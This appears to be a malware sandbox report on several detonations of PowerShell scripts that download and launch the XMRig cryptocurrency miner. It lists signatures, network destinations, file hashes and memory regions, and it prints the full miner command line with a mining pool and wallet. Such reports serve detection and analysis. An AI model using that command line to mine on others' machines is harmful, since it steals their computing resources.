| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1216 wrote to memory of 1636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1216 wrote to memory of 1636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/1216-0-0x00007FF864F03000-0x00007FF864F05000-memory.dmp
memory/1216-1-0x00000183AF440000-0x00000183AF462000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ogqg1s4j.vut.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1216-10-0x00007FF864F00000-0x00007FF8659C2000-memory.dmp
memory/1216-11-0x00007FF864F00000-0x00007FF8659C2000-memory.dmp
memory/1216-12-0x00007FF864F00000-0x00007FF8659C2000-memory.dmp
memory/1216-14-0x00000183AF4D0000-0x00000183AF4E2000-memory.dmp
memory/1216-15-0x00000183AF4B0000-0x00000183AF4BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1636-46-0x00000228BC2A0000-0x00000228BC2C0000-memory.dmp
memory/1636-47-0x00000228BC2E0000-0x00000228BC300000-memory.dmp
memory/1636-48-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-49-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-52-0x00000228BDAD0000-0x00000228BDAF0000-memory.dmp
memory/1636-51-0x00000228BDAB0000-0x00000228BDAD0000-memory.dmp
memory/1216-50-0x00007FF864F00000-0x00007FF8659C2000-memory.dmp
memory/1216-53-0x00007FF864F03000-0x00007FF864F05000-memory.dmp
memory/1216-54-0x00007FF864F00000-0x00007FF8659C2000-memory.dmp
memory/1636-55-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-56-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-57-0x00000228BDAB0000-0x00000228BDAD0000-memory.dmp
memory/1636-58-0x00000228BDAD0000-0x00000228BDAF0000-memory.dmp
memory/1636-59-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-60-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-61-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-62-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-63-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-64-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-65-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-66-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-67-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-68-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-69-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-70-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-71-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-72-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-73-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-74-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-75-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-76-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-77-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-78-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-79-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-80-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-81-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-82-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-83-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-84-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-85-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-86-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-87-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-88-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-89-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-90-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-91-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-92-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-93-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-94-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-95-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-96-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-97-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-98-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-99-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-100-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-101-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-102-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-103-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-104-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-105-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-106-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-107-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-108-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-109-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-110-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-111-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-112-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-113-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-114-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-115-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-116-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
memory/1636-117-0x00007FF7069D0000-0x00007FF707603000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:39
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1020 wrote to memory of 5032 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1020 wrote to memory of 5032 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.173.189.20.in-addr.arpa | udp |
Files
memory/1020-0-0x00007FFFE9CF3000-0x00007FFFE9CF5000-memory.dmp
memory/1020-1-0x00000268BCF10000-0x00000268BCF32000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1fm3fc3z.j10.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1020-11-0x00007FFFE9CF0000-0x00007FFFEA7B1000-memory.dmp
memory/1020-12-0x00007FFFE9CF0000-0x00007FFFEA7B1000-memory.dmp
memory/1020-14-0x00007FFFE9CF0000-0x00007FFFEA7B1000-memory.dmp
memory/1020-15-0x00000268BD410000-0x00000268BD422000-memory.dmp
memory/1020-16-0x00000268A4A40000-0x00000268A4A4A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/5032-47-0x0000027FA9170000-0x0000027FA9190000-memory.dmp
memory/5032-48-0x0000027FA91C0000-0x0000027FA91E0000-memory.dmp
memory/5032-49-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-52-0x0000027FA9200000-0x0000027FA9220000-memory.dmp
memory/5032-51-0x0000027FA91E0000-0x0000027FA9200000-memory.dmp
memory/5032-50-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/1020-53-0x00007FFFE9CF3000-0x00007FFFE9CF5000-memory.dmp
memory/1020-54-0x00007FFFE9CF0000-0x00007FFFEA7B1000-memory.dmp
memory/5032-55-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/1020-56-0x00007FFFE9CF0000-0x00007FFFEA7B1000-memory.dmp
memory/5032-57-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-59-0x0000027FA9200000-0x0000027FA9220000-memory.dmp
memory/5032-58-0x0000027FA91E0000-0x0000027FA9200000-memory.dmp
memory/5032-60-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-61-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-62-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-63-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-64-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-65-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-66-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-67-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-68-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-69-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-70-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-71-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-72-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-73-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-74-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-75-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-76-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-77-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-78-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-79-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-80-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-81-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-82-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-83-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-84-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-85-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-86-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-87-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-88-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-89-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-90-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-91-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-92-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-93-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-94-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-95-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-96-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-97-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-98-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-99-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-100-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-101-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-102-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-103-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-104-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-105-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-106-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-107-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-108-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-109-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-110-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-111-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-112-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-113-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-114-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-115-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-116-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-117-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
memory/5032-118-0x00007FF775BF0000-0x00007FF776823000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:20
Platform
win10v2004-20240226-en
Max time kernel
1800s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 648 wrote to memory of 1988 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 648 wrote to memory of 1988 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
